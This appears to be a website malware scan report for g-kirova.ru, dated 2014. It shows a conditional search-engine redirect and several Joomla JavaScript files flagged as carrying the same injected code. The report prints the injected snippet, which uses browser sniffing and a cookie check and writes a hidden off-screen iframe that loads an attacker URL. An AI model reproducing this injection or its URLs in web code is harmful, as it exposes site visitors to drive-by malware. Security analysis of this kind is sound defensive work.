Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://g-kirova.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: g-kirova.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 28 Sep 2014 23:53:26 GMT Location: http://www.bolltec.com/media/jce/mediaplayer/license.php Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | malicious |
Scanned pages/files
Request | Server response | Status |
http://g-kirova.ru/ | 200 OK Content-Length: 78966 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js | 200 OK Content-Length: 66079 Content-Type: text/javascript | clean |
http://g-kirova.ru/media/system/js/caption.js | 200 OK Content-Length: 3733 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1851 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo var cookie = getCookie('berlingo8ausjtt176a7'); if (cookie == undefined) { setCookie('berlingo8ausjtt176a7', true, 260001); document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>'); } } })(); if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict(); Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 8831 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo Antivirus reports:
| ||
http://g-kirova.ru/templates/theme325/scripts/maxheight.js | 200 OK Content-Length: 2106 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } } })(); var maxHeight = function(classname) { var divs = document.getElements('div.' + classname); var max = 0; divs.each(function(div) { max = Math.max(max, div.getSize().size.y); }); divs.setStyle('height', max); return max; } window.addEvent('load', function() { maxHeight('eqal'); maxHeight.delay(500, maxHeight, 'equal'); }); Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_jalendar/js/jal.js | 200 OK Content-Length: 1978 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } } })(); function aj_nd(curmonth,curyear,mid) { new Ajax(server_url+'modules/mod_jalendar/mod_jalendar.php',{method: 'post',update: 'idcal',data:'curmonth='+curmonth+'&curyear='+curyear+'&mid='+mid}).request(); } Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_ppc_fastfont/js/fastfont.js | 200 OK Content-Length: 4182 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } return null; }; window.onload = setUserOptions; function setUserOptions(){ if(!prefsLoaded){ cookie = readCookie("fontSize"); currentFontSize = cookie ? cookie : defaultFontSize; setFontSize(currentFontSize); prefsLoaded = true; } } window.onunload = saveSettings; function saveSettings() { createCookie("fontSize", currentFontSize, 365); } Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?2613249 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://g-kirova.ru/napisat-nam.html | 200 OK Content-Length: 57202 Content-Type: text/html | clean |
http://g-kirova.ru/media/system/js/validate.js | 200 OK Content-Length: 6016 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); }); Antivirus reports:
| ||
http://g-kirova.ru/karta-sajta.html | 404 Компонент не найден Content-Length: 1844 Content-Type: text/html | clean |
http://g-kirova.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 23:53:35 GMT Location: http://g-kirova.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://g-kirova.ru/test404page.js | 404 Not Found Content-Length: 3621 Content-Type: text/html | clean |
http://g-kirova.ru/hosting_static_404/modernizr.js | 200 OK Content-Length: 6296 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=g-kirova.ru
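Result: This site is not currently listed as suspicious. (Note: a blacklist result reflects only what the list operator has crawled and published; it does not override the redirect and the injected scripts that this scan observed directly. The 302 above was returned to a request carrying a search-engine Referer, while the scan's other request for the same URL returned 200, so the behaviour appears to be conditional and may not be visible to every crawler.)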
Query: http://yandex.com/infected?l10n=en&url=http://g-kirova.ru/
Result: g-kirova.ru is not infected or malware details are not published yet.